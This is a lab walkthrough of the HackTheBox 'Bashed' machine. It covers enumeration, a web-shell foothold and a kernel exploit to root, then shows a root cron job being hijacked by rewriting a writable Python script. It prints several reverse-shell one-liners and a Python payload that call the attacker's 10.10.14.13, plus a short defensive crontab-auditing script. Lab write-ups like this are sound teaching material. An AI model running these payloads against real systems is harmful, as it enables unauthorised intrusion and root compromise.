1. SCANNING

┌──(root💀takudaddy)-[~]
└─# nmap -A -p- 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-19 14:34 KST
Nmap scan report for 10.10.10.68
Host is up (0.20s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

┌──(root💀takudaddy)-[/htb]
└─# gobuster dir -f -t 50 -x html,sh,php,pl -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,pl,html,sh
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2021/04/19 14:45:13 Starting gobuster in directory enumeration mode
===============================================================
/images/              (Status: 200) [Size: 1564]
/icons/               (Status: 403) [Size: 292] 
/about.html           (Status: 200) [Size: 8193]
/index.html           (Status: 200) [Size: 7743]
/uploads/             (Status: 200) [Size: 14]  
/contact.html         (Status: 200) [Size: 7805]
/php/                 (Status: 200) [Size: 939] 
/css/                 (Status: 200) [Size: 1758]
/dev/                 (Status: 200) [Size: 1148]
/js/                  (Status: 200) [Size: 3165]
/config.php           (Status: 200) [Size: 0]   
/fonts/               (Status: 200) [Size: 2095]
/single.html          (Status: 200) [Size: 7477]
/scroll.html          (Status: 200) [Size: 10863]
===============================================================
2021/04/19 15:15:19 Finished

uploads

jenn marshall

An interactive shell opens.

2. EXPLOITATION

www-data@bashed:/var/www/html/dev# date ; id ; hostname ; ifconfig

Sun Apr 18 23:58:45 PDT 2021
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bashed
ens33 Link encap:Ethernet HWaddr 00:50:56:b9:4c:d1
inet addr:10.10.10.68 Bcast:10.10.10.255 Mask:255.255.255.255
inet6 addr: dead:beef::250:56ff:feb9:4cd1/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:4cd1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:780961 errors:0 dropped:0 overruns:0 frame:0
TX packets:762151 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:116588729 (116.5 MB) TX bytes:354062144 (354.0 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:29576 errors:0 dropped:0 overruns:0 frame:0
TX packets:29576 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:2279352 (2.2 MB) TX bytes:2279352 (2.2 MB)

www-data@bashed:/bin# uname -a

Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


www-data@bashed:/home/arrexel# ls -al

total 36
drwxr-xr-x 4 arrexel arrexel 4096 Dec 4 2017 .
drwxr-xr-x 4 root root 4096 Dec 4 2017 ..
-rw------- 1 arrexel arrexel 1 Dec 23 2017 .bash_history
-rw-r--r-- 1 arrexel arrexel 220 Dec 4 2017 .bash_logout
-rw-r--r-- 1 arrexel arrexel 3786 Dec 4 2017 .bashrc
drwx------ 2 arrexel arrexel 4096 Dec 4 2017 .cache
drwxrwxr-x 2 arrexel arrexel 4096 Dec 4 2017 .nano
-rw-r--r-- 1 arrexel arrexel 655 Dec 4 2017 .profile
-rw-r--r-- 1 arrexel arrexel 0 Dec 4 2017 .sudo_as_admin_successful
-r--r--r-- 1 arrexel arrexel 33 Dec 4 2017 user.txt
www-data@bashed:/home/arrexel# cat user.txt

2c281f318555dbc1b856957c7147bfc1

www-data@bashed:/tmp# sudo -l

Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

www-data@bashed:/tmp# sudo -u scriptmanager id

uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
www-data@bashed:/tmp# sudo -u scriptmanager /bin/bash -p

www-data@bashed:/tmp# ls

VMwareDnD
systemd-private-2749b79ae51c415aac91a513270c78d2-systemd-timesyncd.service-yMmyIE
vmware-root
www-data@bashed:/tmp# sudo -u scriptmanager cat /root/root.txt

cat: /root/root.txt: Permission denied

Running things as scriptmanager with sudo -u only works one command at a time from here, not as a lasting shell: the web shell in /dev runs each command non-interactively, so the bash that `sudo -u scriptmanager /bin/bash -p` starts has nothing to read and exits at once, and the next prompt is still www-data.

Another attempt

www-data@bashed:/tmp# wget http://10.10.14.13/LES.sh

--2021-04-19 00:01:23-- http://10.10.14.13/LES.sh
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 87559 (86K) [text/x-sh]
Saving to: 'LES.sh'

0K .......... .......... .......... .......... .......... 58% 121K 0s
50K .......... .......... .......... ..... 100% 11.4M=0.4s

2021-04-19 00:01:24 (206 KB/s) - 'LES.sh' saved [87559/87559]


www-data@bashed:/tmp# chmod 777 LES.sh


www-data@bashed:/tmp# ./LES.sh

76 kernel space exploits
48 user space exploits


Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Exposure: highly probable
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
Download URL: https://www.exploit-db.com/download/45010
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1

[+] [CVE-2017-6074] dccp

Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
Exposure: highly probable
Tags: [ ubuntu=(14.04|16.04){kernel:4.4.0-62-generic} ]
Download URL: https://www.exploit-db.com/download/41458
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass

[+] [CVE-2016-5195] dirtycow

I compiled the exploit-db 45010 (eBPF verifier) code LES pointed at and pulled the binary over, but it would not run from here.

Start a listener and fire off the usual three reverse-shell one-liners:


www-data@bashed:/tmp# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 7979 >/tmp/f

www-data@bashed:/tmp# bash -i >&/dev/tcp/10.10.14.13/7979 0>&1

www-data@bashed:/tmp# php -r '$sock=fsockopen("10.10.14.13",7979);exec("/bin/sh -i<&3 >&3 2>&3");'

All three failed. One thing to keep in mind about the bash one-liner when it is typed into a web shell: PHP hands the line to /bin/sh -c, and on Ubuntu /bin/sh is dash, which has no /dev/tcp and treats `>&/dev/tcp/10.10.14.13/7979` as an ordinary path that does not exist, before bash itself ever starts. Wrapping the whole one-liner in bash -c '...' lets bash perform the redirection.

Another method: use the uploads directory.


www-data@bashed:/var/www/html/uploads# wget http://10.10.14.13/reverse.php

--2021-04-19 00:44:52-- http://10.10.14.13/reverse.php
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5493 (5.4K)
Saving to: 'reverse.php'

0K ..... 100% 347M=0s

2021-04-19 00:44:52 (347 MB/s) - 'reverse.php' saved [5493/5493]

www-data@bashed:/var/www/html/uploads# ls

index.html
reverse.php
www-data@bashed:/var/www/html/uploads# 

Start a listener, then request the file's path, /uploads/reverse.php, in the browser:


┌──(root💀takudaddy)-[/attack]
└─# nc -lvnp 7979                                                               1 ⨯
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.68] 50654
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 00:47:41 up 33 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id ; hostname ; ifconfig
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Foothold obtained.


3. PRIVILEGE ESCALATION

First escalate to scriptmanager, then fetch the exploit that would not run earlier once more and execute it; that is all it takes.

There is no gcc on the box, so compile it in advance and bring the binary over. Build it on a system with a comparable glibc, or link it statically, so the binary actually loads on the target.


$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bashed:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
www-data@bashed:/$ sudo -u scriptmanager /bin/bash -p
sudo -u scriptmanager /bin/bash -p
scriptmanager@bashed:/$ id
id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

(A plain `sudo -u scriptmanager /bin/bash` works just as well. `-p` only stops bash from resetting the effective uid when it differs from the real one, and sudo has already set both to 1001.)


scriptmanager@bashed:~$ which gcc
which gcc
scriptmanager@bashed:~$ wget http://10.10.14.13/45010
wget http://10.10.14.13/45010
--2021-04-19 00:55:43--  http://10.10.14.13/45010
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22264 (22K)
Saving to: '45010'

45010               100%[===================>]  21.74K   107KB/s    in 0.2s    

2021-04-19 00:55:44 (107 KB/s) - '45010' saved [22264/22264]

scriptmanager@bashed:~$ ls
ls
45010  45010.c
scriptmanager@bashed:~$ ls -al
ls -al
total 68
drwxr-xr-x 3 scriptmanager scriptmanager  4096 Apr 19 00:55 .
drwxr-xr-x 4 root          root           4096 Dec  4  2017 ..
-rw------- 1 scriptmanager scriptmanager     2 Dec  4  2017 .bash_history
-rw-r--r-- 1 scriptmanager scriptmanager   220 Dec  4  2017 .bash_logout
-rw-r--r-- 1 scriptmanager scriptmanager  3786 Dec  4  2017 .bashrc
drwxr-xr-x 2 scriptmanager scriptmanager  4096 Dec  4  2017 .nano
-rw-r--r-- 1 scriptmanager scriptmanager   655 Dec  4  2017 .profile
-rw-r--r-- 1 scriptmanager scriptmanager 22264 Apr 18 23:59 45010
-rw-r--r-- 1 scriptmanager scriptmanager 13728 Apr 18 23:59 45010.c
scriptmanager@bashed:~$ chmod 777 45010
chmod 777 45010
scriptmanager@bashed:~$ ./45010
./45010
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff8800352dde00
[*] Leaking sock struct from ffff880033357400
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880039586e40
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff880039586e40
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),1001(scriptmanager)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
cc4f0afe3a1026d402ba10329674a8e2
# 

 

 

 

 

 

Another method

scriptmanager@bashed:/$ cd scripts
cd scripts
scriptmanager@bashed:/scripts$ ls -al
ls -al
drwxrwxr--  2 scriptmanager scriptmanager 4096 Apr 19 01:02 .
drwxr-xr-x 23 root          root          4096 Dec  4  2017 ..
-rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017 test.py
-rw-r--r--  1 root          root            12 Apr 19 01:05 test.txt

scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt

testing 123!scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ 

Running test.py opens test.txt for writing, writes "testing 123!" into it and is meant to close it (f.close is missing its parentheses, so the file is actually only closed when the interpreter exits).

The interesting part is that test.txt's modification time is today. Nobody ran test.py by hand, yet it ran, so root most likely has a cron job executing it on a schedule.

Also, test.txt is owned by root, so whatever wrote it was running as root, which means test.py itself runs as root. test.py is owned by scriptmanager and writable, as is the /scripts directory, so replacing its contents should hand us a root shell on the next run.

Root's own crontab is not readable as scriptmanager, so before touching anything it is worth watching the file's mtime with stat for a couple of minutes to confirm the interval, or running pspy to see the process spawn.


 

 

 

The payload to use is the following,

 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

 

 

and because terminal problems made vi hard to use properly, I appended it one line at a time. Note that the first echo uses a single `>`, which overwrites the original test.py.

scriptmanager@bashed:/scripts$ echo 'import socket,subprocess,os' > test.py
echo 'import socket,subprocess,os' > test.py
scriptmanager@bashed:/scripts$ echo 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM)' >> test.py
echo 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM)' >> test.py
scriptmanager@bashed:/scripts$ echo 's.connect(("10.10.14.13",8989))' >> test.py
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.13",8989))
scriptmanager@bashed:/scripts$ echo 'os.dup2(s.fileno(),0)' >> test.py
echo 'os.dup2(s.fileno(),0)' >> test.py
scriptmanager@bashed:/scripts$ echo 'os.dup2(s.fileno(),1)' >> test.py
echo 'os.dup2(s.fileno(),1)' >> test.py
scriptmanager@bashed:/scripts$ echo 'os.dup2(s.fileno(),2)' >> test.py
echo 'os.dup2(s.fileno(),2)' >> test.py
scriptmanager@bashed:/scripts$ echo 'p=subprocess.call(["/bin/sh","-i"])' >> test.py
echo 'p=subprocess.call(["/bin/sh","-i"])' >> test.py
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.13",8989))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

 

 

Start the listener and wait a little; the connection comes in on its own.

After getting root, checking the crontab shows that every Python file under the scripts directory is run once a minute:

 

┌──(root💀takudaddy)-[/htb/bash]
└─# nc -lvnp 8989                                                           1 ⨯ 2 ⚙
listening on [any] 8989 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.68] 37772
/bin/sh: 0: can't access tty; job control turned off
# id ; whoami ; date ; crontab -l ; date
uid=0(root) gid=0(root) groups=0(root)
root
Mon Apr 19 01:20:23 PDT 2021
* * * * * cd /scripts; for f in *.py; do python "$f"; done
Mon Apr 19 01:20:23 PDT 2021
# cd /root
# cat root.txt
cc4f0afe3a1026d402ba10329674a8e2

Not strictly necessary, but as a test I dropped another .py file into /scripts and waited; it was executed as well.
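The root cause here is a root cron job that globs and executes whatever sits in a directory a non-root user owns. Below is an added example (my code, not from this write-up or the box) that audits a crontab for exactly that pattern: it parses each entry, works out which directory the command loads code from (the `cd` target, since a relative glob like *.py resolves against it, or the directory of any absolute path), and flags it when a non-root user owns or can write to that directory. SAMPLE_CRONTAB is the line `crontab -l` printed above plus one made-up benign entry; SAMPLE_FS is a constructed ownership table that mirrors the `ls -al /scripts` listing (uid/gid 1001 = scriptmanager) and stands in for real stat() calls so it runs anywhere. /usr/local/bin and backup.sh are invented contrasts.

```python
"""Audit a crontab for root-run jobs that load code from a directory a
non-root user owns or can write to (the pattern that gives root on this box).

Added example, not code from the post or the box. SAMPLE_FS is a constructed
ownership table, not a filesystem read.
"""
import re
import shlex
import stat
from typing import Dict, List, Optional, Tuple

# Constructed: path -> (owner uid, group gid, st_mode). Mirrors `ls -al /scripts`.
SAMPLE_FS: Dict[str, Tuple[int, int, int]] = {
    "/scripts": (1001, 1001, 0o40774),        # drwxrwxr--, owned by scriptmanager
    "/scripts/test.py": (1001, 1001, 0o100644),
    "/usr/local/bin": (0, 0, 0o40755),        # made-up root-owned contrast
}

SAMPLE_CRONTAB = """\
# root's crontab as shown by `crontab -l` above, plus one made-up benign entry
* * * * * cd /scripts; for f in *.py; do python "$f"; done
*/5 * * * * /usr/local/bin/backup.sh
"""

CRON_FIELDS = 5  # minute hour day-of-month month day-of-week, then the command


def split_cron_line(line: str) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) for a crontab entry; None for blanks/comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, CRON_FIELDS)
    if len(parts) <= CRON_FIELDS:
        return None
    return " ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]


def working_dirs(command: str) -> List[str]:
    """Directories the command loads code from: every `cd` target plus the
    directory of every absolute path it references. A relative glob such as
    *.py resolves against the `cd` target, so that directory is the one that
    matters for the job on this box."""
    dirs: List[str] = []
    for stmt in re.split(r"[;&|]+", command):
        try:
            tokens = shlex.split(stmt)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            tokens = stmt.split()
        if not tokens:
            continue
        if tokens[0] == "cd" and len(tokens) > 1:
            dirs.append(tokens[1])
            continue
        for tok in tokens:
            if tok.startswith("/"):
                dirs.append(tok.rsplit("/", 1)[0] or "/")
    return list(dict.fromkeys(dirs))   # dedupe, keep order


def writable_by_non_root(path: str, fs=SAMPLE_FS) -> Tuple[bool, str]:
    """True when someone other than root can create or replace files in `path`:
    a non-root owner, world-writable without the sticky bit, or group-writable
    by a non-root group. Paths missing from the table are reported, not flagged."""
    if path not in fs:
        return False, "not in sample table"
    uid, gid, mode = fs[path]
    if uid != 0:
        return True, f"owned by uid {uid}"
    if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
        return True, "world-writable"
    if mode & stat.S_IWGRP and gid != 0:
        return True, f"writable by gid {gid}"
    return False, "root-owned, not group/world writable"


def audit_crontab(text: str, fs=SAMPLE_FS) -> List[dict]:
    """Flag every (job, directory) pair where a root job runs code out of a
    directory a non-root user controls."""
    findings = []
    for line in text.splitlines():
        parsed = split_cron_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        for d in working_dirs(command):
            weak, why = writable_by_non_root(d, fs)
            if weak:
                findings.append({"schedule": schedule, "command": command,
                                 "dir": d, "reason": why})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[!] {f['schedule']}  {f['command']}")
        print(f"    loads code from {f['dir']}: {f['reason']}")
```

On a live system you would replace SAMPLE_FS with os.stat() on each directory and feed in /etc/crontab, /etc/cron.d/* and the spool files; the parsing stays the same, except that system crontab entries carry a user field between the schedule and the command, so CRON_FIELDS becomes 6 for those. The only finding on the sample is /scripts, which is the condition used above: a root job globbing *.py out of a directory scriptmanager owns.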

 

 

 
